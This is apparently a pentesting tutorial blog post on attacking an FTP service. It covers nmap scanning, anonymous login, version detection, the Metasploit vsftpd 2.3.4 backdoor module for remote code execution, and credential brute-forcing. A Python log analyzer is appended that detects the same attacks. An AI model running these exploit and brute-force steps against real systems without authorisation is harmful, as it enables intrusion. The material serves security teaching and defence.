Mon. Aug 26th, 2019

HackIsOn

Learn Different

Penetration testing FTP service


Hello everyone. In this post we discuss how to pentest an FTP service running on port 21. While testing a target for vulnerabilities you may find port 21 (FTP) open; the following method lets you investigate that port further and conclude whether the target is vulnerable or not.

What is FTP?

File Transfer Protocol (FTP) is used to transfer files from one host to another over a computer network. It is also used for downloading files from servers to computers.

Scanning the target for anonymous FTP login:

Anonymous FTP login allows anyone to log in to the FTP server as an anonymous user. You can use the following technique to check whether anonymous login is enabled or not.

Open up your terminal and type the following command:

nmap -A -p 21 {IP}

[Screenshot: scanning FTP with nmap]

NOTE: If the target allows anonymous login, do this step; otherwise move to the next step.

The nmap scan shows that anonymous login is enabled on the target, so try to log in to the FTP server as follows.

ftp { IP }

Type the username as anonymous.

You can type anything in the password field and just hit Enter.

[Screenshot: anonymous FTP login]

Successfully logged in.

FTP version detection:

To exploit the target we need the service version, so that we can search for publicly available exploits. To detect the FTP version of the target, use the following nmap command:

nmap -sV -p 21 { IP }

[Screenshot: finding version with nmap]

The method above uses nmap. An alternative way to detect the FTP version is the Metasploit Framework, which ships with an auxiliary module for scanning FTP versions. To use it, open msfconsole and type the following commands.

use auxiliary/scanner/ftp/ftp_version

set rhosts { IP }

run

[Screenshot: searching module]
[Screenshot: finding version]

Exploiting possible vulnerabilities:

After scanning the target for its version, gather all publicly available exploits for that FTP version from websites like exploit-db, cxsecurity etc., and then try to exploit it. In our case the target runs vsftpd 2.3.4. First, let's search for an exploit using the searchsploit tool.

searchsploit is a tool available by default in Kali Linux that searches a local copy of the exploits from Exploit-DB. These exploits are stored on your Kali Linux machine in the following location: /usr/share/exploitdb

To use the tool, type the following command in your terminal:

searchsploit { service name + version }

The searchsploit result lists a remote code execution exploit for this version, so we can conclude that the target is vulnerable to remote code execution. To exploit the target with Metasploit, use the following commands.

use exploit/unix/ftp/vsftpd_234_backdoor

set rhosts { IP }

run

[Screenshot: exploiting FTP]

Conclusion:

We have successfully exploited the target using the public exploit. There is another way to log in to FTP: brute-forcing. This technique is an older one, but it helps a lot during internal pentesting, because most server admins might use default login details, so try this method when doing internal penetration testing. Metasploit has an auxiliary module for brute-forcing. The following are the commands to use it.

use auxiliary/scanner/ftp/ftp_login

set USERPASS_FILE /root/Desktop/userpass.txt

set rhosts { IP }

run

We have successfully brute-forced the target and found the FTP username and password. This is how to pentest an FTP port. In conclusion, we exploited the target with the methods above.
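Both login paths covered in this post, anonymous login and credential guessing with ftp_login, show up in the FTP server's own login log. The following is an added example, not part of the original post, that flags them from the defender's side. The vsftpd-style line format, the sample lines, and the threshold of 5 failures within 60 seconds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed vsftpd-style login line:
#   <timestamp> [pid N] [user] OK|FAIL LOGIN: Client "ip"
LINE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"'
)
ANON_USERS = {"ftp", "anonymous"}

def analyze(lines, threshold=5, window=timedelta(seconds=60)):
    """Return (anonymous_logins, brute_force_sources, success_after_burst)."""
    anon, fails, flagged, hits = [], defaultdict(list), {}, []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a login event
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        ip, user = m["ip"], m["user"]
        if m["result"] == "OK":
            if user.lower() in ANON_USERS:
                anon.append((ts, ip))      # anonymous access is enabled and in use
            if ip in flagged:
                hits.append((ip, user))    # a guess succeeded: rotate this credential
            continue
        # Sliding window: keep only this source's failures inside the window.
        fails[ip] = [t for t in fails[ip] if ts - t <= window] + [ts]
        if len(fails[ip]) >= threshold:
            flagged.setdefault(ip, ts)
    return anon, sorted(flagged), hits

# Constructed sample log (documentation addresses, not real hosts).
SAMPLE = (
    ['Mon Aug 26 10:00:01 2019 [pid 2101] [ftp] OK LOGIN: '
     'Client "192.0.2.10", anon password "x"']
    + [f'Mon Aug 26 10:05:{s:02d} 2019 [pid 2200] [{u}] FAIL LOGIN: Client "192.0.2.77"'
       for s, u in enumerate(["admin", "root", "ftpuser", "test", "backup"], start=10)]
    + ['Mon Aug 26 10:05:20 2019 [pid 2200] [backup] OK LOGIN: Client "192.0.2.77"',
       'Mon Aug 26 11:00:00 2019 [pid 2300] [alice] FAIL LOGIN: Client "192.0.2.50"',
       'Mon Aug 26 11:30:00 2019 [pid 2301] [alice] OK LOGIN: Client "192.0.2.50"']
)

if __name__ == "__main__":
    anon, sources, hits = analyze(SAMPLE)
    print("anonymous logins:", anon)
    print("brute-force sources:", sources)
    print("successful login after failure burst:", hits)
```

A single mistyped password followed by a successful login, as with the 192.0.2.50 lines in the sample, stays below the threshold and is not reported.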
